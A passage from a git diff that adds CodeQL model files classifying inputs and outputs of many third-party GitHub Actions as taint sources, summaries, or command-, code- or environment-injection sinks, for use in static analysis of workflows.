b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml new file mode 100644 index 000000000000..6df70ae927a6 --- /dev/null +++ b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 000000000000..3f43f195f68f --- /dev/null +++ b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/getsentry_action-release.model.yml b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml new file mode 100644 index 000000000000..3c63d7b845f1 --- /dev/null +++ b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] + - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/github_codeql-action.model.yml b/actions/ql/lib/ext/manual/github_codeql-action.model.yml new file mode 100644 index 000000000000..6db033ebd9fd --- /dev/null +++ b/actions/ql/lib/ext/manual/github_codeql-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml new file mode 100644 index 000000000000..a376aefd6f60 --- /dev/null +++ b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml new file mode 100644 index 000000000000..51ca0af21c3d --- /dev/null +++ b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 000000000000..28d118e6b611 --- /dev/null +++ b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml new file mode 100644 index 000000000000..7e045f8380a4 --- /dev/null +++ b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..2a6d3fac1df7 --- /dev/null +++ b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 000000000000..a3c590ec473e --- /dev/null +++ b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection", "manual"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml new file mode 100644 index 000000000000..98a61516c600 --- /dev/null +++ b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] + - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-url", "env.BUILD_SCAN_TERMS_OF_SERVICE_URL", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml new file mode 100644 index 000000000000..17aaecf80c56 --- /dev/null +++ b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] + - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/hexlet_project-action.model.yml b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml new file mode 100644 index 000000000000..60a68ed2f8d2 --- /dev/null +++ b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 000000000000..3c0820b6878c --- /dev/null +++ b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection", "manual"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml new file mode 100644 index 000000000000..99146ff21be0 --- /dev/null +++ b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml new file mode 100644 index 000000000000..7790454a9349 --- /dev/null +++ b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml new file mode 100644 index 000000000000..e3cea2e555a4 --- /dev/null +++ b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml new file mode 100644 index 000000000000..c3346d689456 --- /dev/null +++ b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 000000000000..2e2c0cff0ef8 --- /dev/null +++ b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection", "manual"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml new file mode 100644 index 000000000000..97b631cdfcd6 --- /dev/null +++ b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml new file mode 100644 index 000000000000..c6d3c5cfb48e --- /dev/null +++ b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml new file mode 100644 index 000000000000..697189cfbd01 --- /dev/null +++ b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] + - ["jsdaniell/create-json", "*", "input.dir", "output.successfully", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml new file mode 100644 index 000000000000..7f82a8b74f5d --- /dev/null +++ b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/jsmith/changes-since-last-tag + - ["jsmith/changes-since-last-tag", "*", "output.files", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.added", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.modified", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.removed", "filename", "manual"] + - ["jsmith/changes-since-last-tag", "*", "output.renamed", "filename", "manual"] + diff --git a/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml new file mode 100644 index 000000000000..95bd63fb22e1 --- /dev/null +++ b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection", "manual"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml new file mode 100644 index 000000000000..1fc8b037530a --- /dev/null +++ b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] + - ["jwalton/gh-ecr-push", "*", "input.region", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml new file mode 100644 index 000000000000..40b8b093957d --- /dev/null +++ b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["kaisugi/action-regex-match", "*", "input.text", "output.*", "taint", "manual"] + diff --git a/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml new file mode 100644 index 000000000000..0c3cf006d3eb --- /dev/null +++ b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml @@ -0,0 +1,8 @@ + +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/karpikpl/list-changed-files-action + - ["karpikpl/list-changed-files-action", "*", "output.changed_files", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml new file mode 100644 index 000000000000..e61008f160ed --- /dev/null +++ b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/actions/ql/lib/ext/manual/knu_changed-files.model.yml b/actions/ql/lib/ext/manual/knu_changed-files.model.yml new file mode 100644 index 000000000000..96e4e8f02f5c --- /dev/null +++ b/actions/ql/lib/ext/manual/knu_changed-files.model.yml @@ -0,0 +1,11 @@ + +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/knu/changed-files + - ["knu/changed-files", "*", "output.changed_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.changed_files_json", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files", "filename", "manual"] + - ["knu/changed-files", "*", "output.matched_files_json", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml new file mode 100644 index 000000000000..feff62d16c07 --- /dev/null +++ b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml new file mode 100644 index 000000000000..b74e721e577f --- /dev/null +++ b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] + - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml new file mode 100644 index 000000000000..d59a122a53ff --- /dev/null +++ b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml new file mode 100644 index 000000000000..8e108765b407 --- /dev/null +++ b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["lots0logs/gh-action-get-changed-files", "*", "output.all", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.added", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.modified", "PR changed files", "manual"] + - ["lots0logs/gh-action-get-changed-files", "*", "output.renamed", "PR changed files", "manual"] + diff --git a/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml new file mode 100644 index 000000000000..6f66e6cf867e --- /dev/null +++ b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml new file mode 100644 index 000000000000..acdc250e3535 --- /dev/null +++ b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["luizfelipelaviola/parse-plain-dotenv", "*", "input.data", "envvar-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml new file mode 100644 index 000000000000..69298631c6e2 --- /dev/null +++ b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/magefile_mage-action.model.yml b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml new file mode 100644 index 000000000000..85631268af72 --- /dev/null +++ b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml new file mode 100644 index 000000000000..18dbcab6f539 --- /dev/null +++ b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml new file mode 100644 index 000000000000..5c3b4b82bc22 --- /dev/null +++ b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml new file mode 100644 index 000000000000..d86870f2f152 --- /dev/null +++ b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml new file mode 100644 index 000000000000..06b1f3afd5d6 --- /dev/null +++ b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSourceModel + data: + # https://github.com/martinhaintz/ga-file-list + - ["martinhaintz/ga-file-list", "*", "output.files", "filename", "manual"] + - ["martinhaintz/ga-file-list", "*", "output.file_names", "filename", "manual"] diff --git a/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml new file mode 100644 index 000000000000..1d0e33bb277d --- /dev/null +++ b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml new file mode 100644 index 000000000000..f08bf9ac6e0d --- /dev/null +++ b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml new file mode 100644 index 000000000000..4e0800281d20 --- /dev/null +++ b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml new file mode 100644 index 000000000000..4ea7e022cbdb --- /dev/null +++ b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/actions/ql/lib/ext/manual/mikefarah_yq.model.yml b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml new file mode 100644 index 000000000000..b16fa3c545b8 --- /dev/null +++ b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mikefarah/yq", "*", "input.cmd", "code-injection", "manual"] + diff --git a/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml new file mode 100644 index 000000000000..09a9673ee896 --- /dev/null +++ b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml new file mode 100644 index 000000000000..d3b34019844a --- /dev/null +++ b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..59cf5d2cf025 --- /dev/null +++ b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml new file mode 100644 index 000000000000..4664937e6bc4 --- /dev/null +++ b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] + - 